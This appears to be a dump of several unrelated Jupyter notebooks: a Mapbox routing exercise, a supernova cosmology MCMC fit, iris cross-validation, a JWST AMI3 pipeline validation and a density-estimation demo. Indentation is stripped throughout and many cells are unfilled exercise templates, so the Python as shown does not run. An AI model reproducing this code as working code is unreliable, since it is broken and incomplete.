sns.distplot(1 - np.array(TotProbMax00),label="SN unchanged MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(TotProbMax01),label="SN random from inside MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(TotProbMax02),label="SN random from outside MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(Prob00sum),label="SN unchanged sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(Prob01sum),label="SN random from inside sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(Prob02sum),label="SN random from outside sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
plt.legend()
OxC00[3]
file=2
insideline=0
GN=0
SN=1
NDic02[RealFilesNames[file]]#[insideline][SN]
for i in np.arange(C00breaks[file-1]+1,C00breaks[file]):
for m,j in enumerate((TokFil00[i].split('\n'))):
if (j.split(" ")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):
print((np.sum((np.exp(OxA00[i][m][msk]))/(np.sum((np.exp(OxA00[i][m])))))))
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
for n,i in enumerate(np.arange(C00breaks[file-1]+1,C00breaks[file])):
for m,j in enumerate((TokFil00[i].split('\n'))):
if (j.split(" ")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):
print((np.exp(np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
for n,i in enumerate(np.arange(C00breaks[file-1]+1,C00breaks[file])):
for m,j in enumerate((TokFil00[i].split('\n'))):
if (j.split(" ")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):
print((np.exp(np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))
```
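The expression `np.exp(np.max(OxA[i][m][msk])) / np.sum(np.exp(OxA[i][m]))` that recurs above is the softmax probability of the single highest-scoring masked label, while the `sum` variant is the total softmax mass over all masked labels. A standalone sketch with hypothetical scores makes the difference explicit:

```
import math

def masked_softmax_probs(scores, mask):
    # Softmax over `scores`; return the (max, sum) probability
    # restricted to the indices in `mask`.
    exps = [math.exp(s) for s in scores]
    total = sum(exps)
    masked = [exps[i] for i in mask]
    return max(masked) / total, sum(masked) / total

# Hypothetical unary scores for 6 labels; the mask picks two name labels.
masked_softmax_probs([0.1, 2.0, -1.0, 1.5, 0.0, 0.3], mask=[1, 3])
# -> (approx. 0.471, approx. 0.756)
```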
# A Cartographer's Expedition
You and your friends have decided to tackle NYC old school! No cell phones or GPS devices allowed. Although everyone is a bit nervous, you realize that using an actual map might be pretty cool.
Your goal is to generate a map that plots a route between five and six locations in the city. Plotly Express and Mapbox should be used to plot the route (point A to point B to point C) for the expedition.
## Import the required libraries and dependencies
```
import pandas as pd
import plotly.express as px
import os
from pathlib import Path
from dotenv import load_dotenv
```
## Step 1: Create a .env file to hold your Mapbox API Access Token
## Step 2: Read in the Mapbox API access token using the `os.getenv` function. Use the function provided to confirm that the token is available for use in the program. Finally, set your Mapbox API access token as the parameter in the `px.set_mapbox_access_token` function.
```
# Set up API credentials
# Read the Mapbox API access token
# YOUR CODE HERE
# Confirm that the mapbox_api_access_token is available
if not mapbox_api_access_token:
print("Error with the Mapbox API access token. Check the .env file.")
# Set the Mapbox API access token
# YOUR CODE HERE
```
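A minimal sketch of the token check, using only the standard library (the variable name `MAPBOX_API_ACCESS_TOKEN` is an assumption; use whatever key your `.env` file defines, with `load_dotenv()` from the imports above populating the environment):

```
import os

# Assumed environment variable name; a real token would come from .env.
os.environ.setdefault("MAPBOX_API_ACCESS_TOKEN", "pk.example-token")

mapbox_api_access_token = os.getenv("MAPBOX_API_ACCESS_TOKEN")

if not mapbox_api_access_token:
    print("Error with the Mapbox API access token. Check the .env file.")
else:
    # px.set_mapbox_access_token(mapbox_api_access_token)
    print("Token loaded.")
```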
## Step 3: Read in the `nyc_excursion_plans.csv` file into a Pandas DataFrame. Drop any rows that contain missing data or NaN values.
```
# Read the nyc_excursion_plans.csv file into a DataFrame
places_of_interest = # YOUR CODE HERE
# Review the DataFrame
# YOUR CODE HERE
```
## Step 4: Slice the DataFrame to include the arrival airport and the first location
```
# Create a DataFrame with the arriving Airport and the first location you will visit
arrival_and_first_location = # YOUR CODE HERE
# Plot the arriving airport and the first location
first_route = # YOUR CODE HERE
# Show the plot
# YOUR CODE HERE
```
## Step 5: Plot the route between your first, second, and third locations.
```
# Plot the route between the first second and third locations
first_second_third_locations = # YOUR CODE HERE
# Create the plot including your first, second and third locations
second_route = # YOUR CODE HERE
# Show the Plot
# YOUR CODE HERE
```
## Step 6: Plot the route between your third, fourth, and fifth locations.
```
# Create a DataFrame with your third, fourth, and fifth locations
third_fourth_fifth_locations = # YOUR CODE HERE
# Create the plot including your third, fourth and fifth locations
third_route = # YOUR CODE HERE
# Show the Plot
# YOUR CODE HERE
```
## Step 7: Plot all the stops in your excursion
```
# Plot course for all of the stops in your excursion, including the airport
all_stops = # YOUR CODE HERE
# Create the plot that shows all of your stops
plot_all_stops = # YOUR CODE HERE
# Show the Plot
# YOUR CODE HERE
```
**Question** Given the location of the stops on your excursion, what is the order in which you should visit them to get you back to the airport most efficiently?
**Answer** # YOUR ANSWER HERE
```
import emcee
import pandas as pd
import numpy as np
from scipy import stats
import chainconsumer
import matplotlib.pyplot as plt
from scipy.integrate import quad
from chainconsumer import ChainConsumer
plt.rc('font', size=15) # controls default text sizes
plt.rc('axes', titlesize=15) # fontsize of the axes title
plt.rc('axes', labelsize=15) # fontsize of the x and y labels
plt.rc('xtick', labelsize=12) # fontsize of the tick labels
plt.rc('ytick', labelsize=12) # fontsize of the tick labels
plt.rc('legend', fontsize=12) # legend fontsize
%config InlineBackend.figure_format = 'svg'
data_pd = pd.read_csv("hlsp_ps1cosmo_panstarrs_gpc1_all_model_v1_lcparam-full.txt",sep=' ',usecols=[0,1,2,3,4,5])
z = data_pd['zhel'].astype(float)
dz = data_pd['dz'].astype(float)
muB = data_pd['mb'].astype(float)
dmuB = data_pd['dmb'].astype(float)
data = {}
data['z'] = z
data['dz'] = dz
data['muB'] = muB
data['dmuB'] = dmuB
plt.rcParams['figure.figsize'] = [20, 12] # set plotsize
plt.rcParams.update({'font.size': 22}) # set fontsize
fig,ax = plt.subplots(1,1)
xlim = (0, 2)
ylim = (13, 27)
#xlabel = r"$z$"
#ylabel = r"$\mu_{B}$"
ax.errorbar(x=z,y=muB,xerr=dz,yerr=dmuB,linestyle='None',label='Type Ia SNe')
ax.set_xlim(xlim)
ax.set_ylim(ylim)
leg = ax.legend(loc='lower right')
ax.set_xlabel('Redshift (z)')
ax.set_ylabel('Distance modulus (mu)')
ax.set_title('Distance modulus vs redshift for Type 1a SNe ')
def get_default_parameters(update=None):
pars = {}
pars['omega_m'] = 0.3
pars['omega_L'] = 0.7
pars['omega_K'] = 0.0
pars['h'] = 0.72
pars['w'] = -1.
if update is not None:
pars.update(update)
return pars
def get_starting_point(name_list):
sp = {}
sp['omega_m'] = 0.24
sp['omega_L'] = 0.74
sp['omega_K'] = 0.0
sp['h'] = 0.65
sp['w'] = -1.
return np.array([sp[x] for x in name_list])
def get_latex_names(name_list):
latex_names = {}
latex_names['omega_m'] = '$\Omega_m$'
latex_names['omega_L'] = '$\Omega_L$'
latex_names['omega_K'] = '$\Omega_K$'
latex_names['h'] = '$h$'
latex_names['w'] = '$w$'
return [latex_names[x] for x in name_list]
#constraints on the parameter values
parameter_limits={
'omega_m' : [0., 1.],
'omega_L' : [0., 1.],
'omega_K' : [0., 0.], #Flat Universe
'h' : [.2, 1.],
'w' : [-1., -1.] #Lambda CDM
}
def log_prior(pars, names):
count = 0
for name in names:
limits = parameter_limits[name]
low, high = limits[0], limits[1]
if pars[name]<low or pars[name]>high:
count+=1
if count!=0:
return -np.inf
else:
prior = 0
prior += ((pars['h']-0.6766)/0.0042)**2 #Planck h gaussian
prior += ((pars['omega_m']-0.315)/0.007)**2 #Planck Omega_m gaussian
return prior
def log_likelihood(fit_par_values, fit_par_names, flat):
# f_gas data
z, muB, dmuB = data['z'], data['muB'], data['dmuB']
pars = get_default_parameters()
for par_value, par_name in zip(fit_par_values, fit_par_names):
pars[par_name] = par_value
if not np.isfinite(log_prior(pars, fit_par_names)):
return -np.inf
else:
log_likelihood = 0.
if flat==True:
pars['omega_L'] = 1 - pars['omega_m']
pars['omega_K'] = 0.
else:
pars['omega_K'] = 1 - pars['omega_m'] - pars['omega_L']
for z_i, muB_i, dmuB_i in zip(z,muB,dmuB):
muB_model = mu_model(z_i, pars)
log_likelihood +=((muB_i-muB_model)**2)/(dmuB_i)**2
return -log_likelihood - log_prior(pars, fit_par_names)
def E_z(z, pars):
omega_m = pars['omega_m']
omega_L = pars['omega_L']
omega_K = pars['omega_K']
w = pars['w']
EoS = (1+z)**(3*(1+w))
return np.sqrt(omega_m*(1+z)**3 + omega_L*EoS + omega_K*(1+z)**2)
def one_over_E_z(z, pars):
return 1/E_z(z, pars)
def d_l(z, pars):
#scale the Hubble parameter
H0 = pars['h']*100
#speed of light
c = 299792.458 # c in km/s
#integrate for DL based on the given parameter values
integral = quad(one_over_E_z, 0.01, z, args=(pars,))[0]
factor =c/(H0*(1+z))
return factor*integral
def mu_model(z, pars):
return 5*np.log10(d_l(z,pars))+25
def run_mcmc(fit_par_names, flat=True):
pars = get_default_parameters()
starting_point = get_starting_point(fit_par_names)
std = 0.2*starting_point
ndim = len(fit_par_names)
nwalkers = 32
p0 = emcee.utils.sample_ball(starting_point, std, size=nwalkers)
sampler = emcee.EnsembleSampler(nwalkers, ndim, log_likelihood, args=[fit_par_names,flat])
sampler.run_mcmc(p0, 20000, progress=True);
samples = sampler.get_chain(discard=10000, flat=True)
if flat==True and 'omega_m' in fit_par_names:
#print('first one')
samples_new = np.column_stack((1-samples[:,0], samples))
elif flat==False and 'omega_m' in fit_par_names:
#print('second one')
try:
samples_new = np.column_stack((1-samples[:,fit_par_names.index('omega_m')]-
samples[:,fit_par_names.index('omega_L')], samples))
except:
samples_new = np.column_stack((1-samples[:,fit_par_names.index('omega_m')]-
pars['omega_L'], samples))
else:
samples_new = samples
return samples_new
fit_par_names = ['omega_m', 'h']
chain = run_mcmc(fit_par_names, flat=True)
par_names_latex = get_latex_names(['omega_L']+fit_par_names)
c = ChainConsumer().add_chain(chain, parameters=par_names_latex).configure(statistics="max", summary=True,usetex=False)
fig = c.plotter.plot()
```
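For reference, the ensemble sampling that `emcee` performs above can be illustrated with a minimal single-chain Metropolis sketch on a toy 1D Gaussian posterior (a standalone illustration of the accept/reject loop and burn-in discard, not part of the cosmology fit):

```python
import numpy as np

rng = np.random.default_rng(0)

def log_post(x):
    # unnormalised log-posterior of a standard 1D Gaussian
    return -0.5 * x**2

x, chain = 5.0, []                    # deliberately poor starting point
for _ in range(20000):
    prop = x + rng.normal()           # symmetric random-walk proposal
    # accept with probability min(1, posterior ratio)
    if np.log(rng.uniform()) < log_post(prop) - log_post(x):
        x = prop
    chain.append(x)

samples = np.array(chain[5000:])      # drop burn-in, like discard= above
print(samples.mean(), samples.std())  # should land near 0 and 1
```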
|
github_jupyter
|
# Predicting Iris Species Data
```
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from sklearn import *
from sklearn.datasets import load_iris
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
```
## DataFrame
```
iris = load_iris()
iris_df = pd.DataFrame(data=iris.data,columns=iris.feature_names)
iris_df['label'] = iris.target
iris_df
iris_df.shape
```
## Splitting the Data into Train/Test Sets
```
X_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target,
test_size = 0.3,
random_state = 100)
```
## Training and Evaluating the Model
Model to use: LGBM
```python
from lightgbm import LGBMClassifier
model_lgbm = LGBMClassifier() # define the model
model_lgbm.fit(???,???) # train the model
model_lgbm.score(???,???) # score the model
model_lgbm.predict(???) # store the model's predictions
```
```
# define the model
# train the model
# score the model
# store the model's predictions
```
## Cross Validation
### Types of Cross-Validation
1. K-fold cross-validation
- Splits the dataset into K sub-sets
- Each of the K sub-sets is held out once while the remaining K-1 sub-sets are used as the training set, so K models are fit in total
- K=5 or K=10 is typically used (see the literature)
- The smaller K is, the more biased the model evaluation inevitably becomes
- The larger K is, the lower the bias of the evaluation, but the variance of the results can be higher
2. LOOCV (Leave-one-out cross-validation)
- K-fold cross-validation where each fold contains a single sample
- K is set to the total number of samples, so every observation is held out of the dataset once
- Very slow on large datasets, but produces good results on small ones
- Advantage: no data in the dataset is wasted
- Disadvantage: measurement and evaluation are expensive
3. Stratified K-fold cross-validation
- The label values are chosen so that they are distributed roughly equally across all folds
- A process that rearranges the data so that each fold is a good representative of the whole
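The fold mechanics described above can be sketched by hand with NumPy (index bookkeeping only; `sklearn.model_selection.KFold` does exactly this for you):

```python
import numpy as np

def kfold_indices(n_samples, k):
    # split [0, n_samples) into k roughly equal folds;
    # each fold is the test set exactly once, the rest form the training set
    idx = np.arange(n_samples)
    folds = np.array_split(idx, k)
    for i in range(k):
        test = folds[i]
        train = np.concatenate([folds[j] for j in range(k) if j != i])
        yield train, test

for train, test in kfold_indices(10, 5):
    print(len(train), len(test))  # 8 2 on every iteration
```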
### Kfold
```python
from sklearn.model_selection import KFold
kfold = KFold(n_splits = 5, shuffle=False) # set up the cross-validation method
from sklearn.model_selection import cross_val_score, cross_validate
cross_val_score(????, iris.data, iris.target, cv=kfold)
```
### StratifiedKFold
```python
from sklearn.model_selection import StratifiedKFold
skfold = StratifiedKFold(n_splits = 5, shuffle=False) # set up the cross-validation method
cross_val_score(???,
iris.data,
iris.target,
cv=skfold # the cross-validation splitter
)
```
### LeaveOneOut
```python
from sklearn.model_selection import LeaveOneOut
leavefold = LeaveOneOut() # set up the cross-validation method
cross_val_score(???,
iris.data,
iris.target,
cv=leavefold # the cross-validation splitter
)
```
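One way to fill in the `???` placeholders above is with the `DecisionTreeClassifier` imported at the top of the notebook (any estimator with `fit`/`predict` works):

```python
from sklearn.datasets import load_iris
from sklearn.model_selection import KFold, cross_val_score
from sklearn.tree import DecisionTreeClassifier

iris = load_iris()

# shuffle=True matters for iris: the rows are sorted by class,
# so an unshuffled fold can contain a single label
kfold = KFold(n_splits=5, shuffle=True, random_state=0)

scores = cross_val_score(DecisionTreeClassifier(random_state=0),
                         iris.data, iris.target, cv=kfold)
print(scores, scores.mean())
```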
|
github_jupyter
|
<a id="title_ID"></a>
# JWST Pipeline Validation Notebook: AMI3, AMI3 Pipeline
<span style="color:red"> **Instruments Affected**</span>: NIRISS
### Table of Contents
<div style="text-align: left">
<br> [Introduction](#intro)
<br> [JWST CalWG Algorithm](#algorithm)
<br> [Defining Terms](#terms)
<br> [Test Description](#description)
<br> [Data Description](#data_descr)
<br> [Set up Temporary Directory](#tempdir)
<br> [Imports](#imports)
<br> [Loading the Data](#data_load)
<br> [Run the Pipeline](#pipeline)
<br> [Test Results](#testing)
<br> [About This Notebook](#about)
</div>
<a id="intro"></a>
# Introduction
The notebook verifies that pipeline steps from `calwebb_detector1` through `calwebb_image2` and `calwebb_ami3` run without crashing. `calwebb_ami3` is run on various associations of target and calibrator pairs.
For more information on the `calwebb_ami3` pipeline stage visit the links below.
> Stage description: https://jwst-pipeline.readthedocs.io/en/latest/jwst/pipeline/calwebb_ami3.html
>
> Pipeline code: https://github.com/spacetelescope/jwst/tree/master/jwst/ami
[Top of Page](#title_ID)
<a id="algorithm"></a>
# JWST CalWG Algorithm
`calwebb_ami3` is based on the `implaneia` algorithm:
> https://github.com/anand0xff/ImPlaneIA/tree/delivery
[Top of Page](#title_ID)
<a id="terms"></a>
# Defining Terms
Calibrator: reference star to measure PSF to calibrate out instrumental contributions to the interferometric observables
PSF: point spread function
Target: source of interest for science program
[Top of Page](#title_ID)
<a id="description"></a>
# Test Description
This test checks that simulated data runs through the `calwebb_detector1`, `calwebb_image2`, and `calwebb_ami3` steps of the pipeline without crashing. Association files are created for the target/calibrator pair at different dither positions. The notebook verifies that the `calwebb_ami3` runs on these association files.
[Top of Page](#title_ID)
<a id="data_descr"></a>
# Data Description
The data for this test are simulated AMI datasets that do not have bad pixels. The simulated source data is AB Dor, which is simulated with a 4-point dither pattern:
| Source | Filename| Dither Position |
|:----------------|:---------|:-----------------|
|AB Dor (Target) |jw01093001001_01101_00005_nis_uncal.fits| 1|
| |jw01093001001_01101_00006_nis_uncal.fits| 2 |
| |jw01093001001_01101_00007_nis_uncal.fits| 3 |
| |jw01093001001_01101_00008_nis_uncal.fits| 4 |
HD 37093 is the PSF reference star, which is also simulated with a 4-point dither pattern.
| Source | Filename| Dither Position |
|:----------------|:---------|:-----------------|
|HD 37093 (Calibrator)| jw01093002001_01101_00005_nis_uncal.fits | 1 |
| |jw01093002001_01101_00006_nis_uncal.fits | 2 |
| |jw01093002001_01101_00007_nis_uncal.fits | 3 |
| |jw01093002001_01101_00008_nis_uncal.fits | 4 |
Configuration files are also needed for the various `calwebb_ami3` steps:
- ami_analyze.cfg
- ami_normalize.cfg
- ami_average.cfg
- calwebb_ami3.cfg
Specific reference files are needed for the analysis, which also do not have bad pixels, and are loaded with this notebook.
[Top of Page](#title_ID)
<a id="tempdir"></a>
# Set up Temporary Directory
[Top of Page](#title_ID)
```
use_tempdir = True
# Create a temporary directory to hold notebook output, and change the working directory to that directory.
from tempfile import TemporaryDirectory
import os
import shutil
if use_tempdir:
data_dir = TemporaryDirectory()
# Save original directory
orig_dir = os.getcwd()
# Move to new directory
odir = data_dir.name
os.chdir(data_dir.name)
# For info, print out where the script is running
print("Running in {}".format(os.getcwd()))
import os
if 'CRDS_CACHE_TYPE' in os.environ:
if os.environ['CRDS_CACHE_TYPE'] == 'local':
os.environ['CRDS_PATH'] = os.path.join(os.environ['HOME'], 'crds', 'cache')
elif os.path.isdir(os.environ['CRDS_CACHE_TYPE']):
os.environ['CRDS_PATH'] = os.environ['CRDS_CACHE_TYPE']
print('CRDS cache location: {}'.format(os.environ['CRDS_PATH']))
```
<a id="imports"></a>
# Imports
List the package imports and why they are relevant to this notebook.
* astropy.io for opening fits files
* numpy for working with arrays
* IPython.display for printing markdown output
* jwst.datamodels for building model for JWST Pipeline
* jwst.pipeline.collect_pipeline_cfgs for gathering configuration files
* jwst.pipeline for initiating various pipeline stages
* jwst.ami to call the AMI Analyze step
* jwst.associations for using association files
* from ci_watson.artifactory_helpers import get_bigdata for reading data from Artifactory
[Top of Page](#title_ID)
```
from astropy.io import fits
import numpy as np
from IPython.display import Markdown
from jwst.datamodels import ImageModel
import jwst.datamodels as datamodels
from jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs
from jwst.pipeline import Detector1Pipeline, Image2Pipeline, Image3Pipeline, Ami3Pipeline
from jwst.ami import AmiAnalyzeStep
from jwst.associations import asn_from_list
from jwst.associations.lib.rules_level3_base import DMS_Level3_Base
from ci_watson.artifactory_helpers import get_bigdata
```
<a id="data_load"></a>
# Loading the Data
[Top of Page](#title_ID)
```
# Data files that will be imported by Artifactory:
datafiles = np.array(['jw01093001001_01101_00005_nis_uncal.fits',
'jw01093001001_01101_00006_nis_uncal.fits',
'jw01093001001_01101_00007_nis_uncal.fits',
'jw01093001001_01101_00008_nis_uncal.fits',
'jw01093002001_01101_00005_nis_uncal.fits',
'jw01093002001_01101_00006_nis_uncal.fits',
'jw01093002001_01101_00007_nis_uncal.fits',
'jw01093002001_01101_00008_nis_uncal.fits'])
# Read in reference files needed for this analysis (these don't have bad pixels, like simulations)
superbiasfile = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'jwst_niriss_superbias_sim.fits')
darkfile = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'jwst_niriss_dark_sub80_sim.fits')
flatfile = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'jwst_niriss_flat_general.fits')
# Read in configuration files
ami_analyze_cfg = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'ami_analyze.cfg')
ami_normalize_cfg = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'ami_normalize.cfg')
ami_average_cfg = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'ami_average.cfg')
calwebb_ami3_cfg = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'calwebb_ami3.cfg')
```
<a id="pipeline"></a>
# Run the Pipeline
Since this notebook tests whether the pipeline runs on all the datasets, we will run each stage of the pipeline in separate cells. That way, if a step fails, it will be easier to track down at what stage and step this error occurred.
[Top of Page](#title_ID)
## Run Detector1 stage of the pipeline to calibrate \*\_uncal.fits file
```
for file in datafiles:
df = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
file)
# Modify a keyword in each data file: only necessary for now
# Next three lines are temporary to accommodate recent changes to Mirage and pipeline
# and for Mirage to work with the pipeline.
with datamodels.open(df) as model:
model.meta.dither.dither_points = int(model.meta.dither.dither_points)
model.save(df)
# Run Detector1 stage of pipeline, specifying superbias and dark reference files
result1 = Detector1Pipeline()
result1.superbias.override_superbias = superbiasfile
result1.dark_current.override_dark = darkfile
result1.ipc.skip = True
result1.save_results = True
result1.output_dir = odir
result1.run(df)
```
## Run Image2 stage of the pipeline to calibrate \*\_rate.fits file
```
for df in datafiles:
# Run Image2 stage of the pipeline on the file created above to create rate file,
# specifying flat field file
df_rate = os.path.join(odir, os.path.basename(df.replace('uncal','rate')))
result2 = Image2Pipeline()
result2.flat_field.override_flat = flatfile
result2.photom.skip = True
result2.resample.skip = True
result2.save_results = True
result2.output_dir = odir
result2.run(df_rate)
```
## Run Image2 stage of the pipeline to calibrate \*\_rateints.fits file
```
for df in datafiles:
# Run Image stage of the pipeline to create rateints file, specifying flat field file
df_rateints = os.path.join(odir,os.path.basename(df.replace('uncal','rateints')))
result3 = Image2Pipeline()
result3.flat_field.override_flat = flatfile
result3.photom.skip = True
result3.resample.skip = True
result3.save_results = True
result3.output_dir = odir
result3.run(df_rateints)
```
## Run AmiAnalyze step on the \*\_cal.fits files created above
```
for df in datafiles:
# Set up name of calibrated file
df_cal = os.path.join(odir,os.path.basename(df.replace('uncal','cal')))
# Run AMI Analyze Step of the pipeline
result5 = AmiAnalyzeStep.call(df_cal, config_file = ami_analyze_cfg,
output_dir = odir, save_results = True)
```
## Run AmiAnalyze on various target/calibrator pairs
Create association files to test calibration of target at different dither positions. Run AmiAnalyze on these association files.
Note: the `program` and `targ_name` fields in the association files are the same for all pairs, so I have them set as default values in the `create_asn` routine.
Routine for creating association files (in \*.json format)
```
def create_asn(outdir, targ1, psf1, prod_name, out_file, asn_id,
program="1093_2_targets_f480m_2022.25coords_pipetesting",
targ_name='t001',
targ2=None, psf2=None):
# Create association file:
asn = asn_from_list.asn_from_list([os.path.join(outdir,targ1)],
product_name = prod_name,
output_file = os.path.join(outdir,out_file),
output_dir = outdir,rule = DMS_Level3_Base)
asn['products'][0]['members'].append({'expname': os.path.join(odir,psf1),
'exptype': 'psf'})
# check whether a 2nd set of target/calibrator pairs was provided
if targ2 is not None:
asn['products'][0]['members'].append({'expname':os.path.join(odir,targ2),
'exptype': 'science'})
asn['products'][0]['members'].append({'expname':os.path.join(odir,psf2),
'exptype': 'psf'})
asn['asn_type'] = 'ami3'
asn['asn_id'] = asn_id
asn['program'] = program
asn['target'] = targ_name
with open(os.path.join(outdir,out_file), 'w') as fp:
fp.write(asn.dump()[1])
fp.close()
```
### Create association files and run AmiAnalyze on these pairs
Association file 1 to calibrate average of targets at dithers 2 and 3 with the average of calibrators at dithers 2 and 3.
```
asn1_file = "ami_asn001_targets23_cals23.json"
targ1 = "jw01093001001_01101_00006_nis_cal.fits"
psf1 = "jw01093002001_01101_00006_nis_cal.fits"
prod_name = "jw01093001001_01101"
asn_id = '001'
# Add second target/calibrator pair at this dither step
targ2 = "jw01093001001_01101_00007_nis_cal.fits"
psf2 = "jw01093002001_01101_00007_nis_cal.fits"
create_asn(odir, targ1, psf1, prod_name, asn1_file, asn_id, targ2=targ2, psf2=psf2)
# Run AmiAnalyze
Ami3Pipeline.call(asn1_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 2 to calibrate target at POS1 with calibrator at POS1
```
# Create association file:
asn2_file = "ami_asn002_calibrate_targ1_cal1.json"
targ1 = "jw01093001001_01101_00005_nis_cal.fits"
psf1 = 'jw01093002001_01101_00005_nis_cal.fits'
prod_name = "jw01093001001_01101_00005cal00005"
asn_id = '002'
create_asn(odir, targ1, psf1,prod_name, asn2_file, asn_id)
# Run AmiAnalyze
Ami3Pipeline.call(asn2_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 3 to calibrate target at POS2 with calibrator at POS2
```
# Create association file:
asn3_file = "ami_asn003_calibrate_targ2_cal2.json"
targ1 = "jw01093001001_01101_00006_nis_cal.fits"
psf1 = "jw01093002001_01101_00006_nis_cal.fits"
prod_name = "jw01093001001_01101_00006cal00006"
asn_id = '003'
create_asn(odir, targ1, psf1, prod_name, asn3_file, asn_id)
# Run AmiAnalyze
Ami3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 4 to calibrate target at POS3 with calibrator at POS3
```
# Create association file:
asn4_file = "ami_asn004_calibrate_targ3_cal3.json"
targ1 = "jw01093001001_01101_00007_nis_cal.fits"
psf1 = "jw01093002001_01101_00007_nis_cal.fits"
prod_name = "jw01093001001_01101_00007cal00007"
asn_id = '004'
create_asn(odir, targ1, psf1, prod_name, asn4_file, asn_id)
# Run AmiAnalyze
Ami3Pipeline.call(asn4_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 5 to calibrate target at POS4 with calibrator at POS4
```
# Create association file:
asn5_file = "ami_asn005_calibrate_targ4_cal4.json"
targ1 = "jw01093001001_01101_00008_nis_cal.fits"
psf1 = "jw01093002001_01101_00008_nis_cal.fits"
prod_name = "jw01093001001_01101_00008cal00008"
asn_id = '005'
create_asn(odir, targ1, psf1, prod_name, asn5_file, asn_id)
# Run AmiAnalyze
Ami3Pipeline.call(asn5_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 6 to calibrate calibrator at POS2 with calibrator at POS3
```
# Create association file:
asn6_file = "ami_asn006_calibrate_cal2_cal3.json"
targ1 = "jw01093002001_01101_00006_nis_cal.fits"
psf1 = "jw01093002001_01101_00007_nis_cal.fits"
prod_name = "jw01093002001_01101_00006cal00007"
asn_id = '006'
create_asn(odir, targ1, psf1, prod_name, asn6_file, asn_id, targ_name='t002')
# Run AmiAnalyze
Ami3Pipeline.call(asn6_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 7 to calibrate calibrator at POS3 with calibrator at POS2
```
# Create association file:
asn7_file = "ami_asn007_calibrate_cal3_cal2.json"
targ1 = "jw01093002001_01101_00007_nis_cal.fits"
psf1 = "jw01093002001_01101_00006_nis_cal.fits"
prod_name = "jw01093002001_01101_00007cal00006"
asn_id = '007'
create_asn(odir, targ1, psf1, prod_name, asn7_file, asn_id, targ_name='t002')
# Run AmiAnalyze
Ami3Pipeline.call(asn7_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
<a id="testing"></a>
# Test Results
Did the above cells run without errors? If so, **huzzah** the test passed!
If not, track down why the pipeline failed to run on these datasets.
[Top of Page](#title_ID)
<a id="about_ID"></a>
## About this Notebook
**Authors:** Deepashri Thatte, Senior Staff Scientist, NIRISS
<br>Stephanie LaMassa, Scientist, NIRISS
<br>**Updated On:** 08/04/2021
[Top of Page](#title_ID)
<img style="float: right;" src="./stsci_pri_combo_mark_horizonal_white_bkgd.png" alt="stsci_pri_combo_mark_horizonal_white_bkgd" width="200px"/>
|
github_jupyter
|
# Density estimation demo
Here we demonstrate how to use the ``inference.pdf`` module for estimating univariate probability density functions from sample data.
```
from numpy import linspace, zeros, exp, log, sqrt, pi
from numpy.random import normal, exponential
from scipy.special import erfc
import matplotlib.pyplot as plt
```
## Kernel-density estimation
Gaussian kernel-density estimation is implemented via the `GaussianKDE` class:
```
# generate some sample data to use as a test-case
N = 150000
sample = zeros(N)
sample[:N//3] = normal(size=N//3)*0.5 + 1.8
sample[N//3:] = normal(size=2*(N//3))*0.5 + 3.5
# GaussianKDE takes an array of sample values as its only argument
from inference.pdf import GaussianKDE
PDF = GaussianKDE(sample)
```
Instances of density estimator classes like `GaussianKDE` can be called as functions to return the estimate of the PDF at given spatial points:
```
x = linspace(0, 6, 1000) # make an axis on which to evaluate the PDF estimate
p = PDF(x) # call the instance to get the estimate
```
We could plot the estimate manually, but for convenience the `plot_summary()` method will generate a plot automatically as well as summary statistics:
```
PDF.plot_summary()
```
The summary statistics can be accessed via properties or methods:
```
# the location of the mode is a property
mode = PDF.mode
# The highest-density interval for any fraction of total probability is returned by the interval() method
hdi_95 = PDF.interval(frac = 0.95)
# the mean, variance, skewness and excess kurtosis are returned by the moments() method:
mean, variance, skewness, kurtosis = PDF.moments()
```
By default, `GaussianKDE` uses a simple but cheap-to-compute estimate of the bandwidth (the standard deviation of each Gaussian kernel).
However, when estimating strongly non-normal distributions, this simple approach over-estimates the required bandwidth.
In these cases, the cross-validation bandwidth selector can be used to obtain better results, at a higher computational cost.
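The notebook doesn't say which rule `GaussianKDE` uses internally; as an illustration of a "simple but cheap" bandwidth, Silverman's rule of thumb is the classic choice (an assumption here, representative rather than necessarily the exact rule implemented). It shows why simple rules over-smooth multimodal data:

```python
import numpy as np

def silverman_bandwidth(sample):
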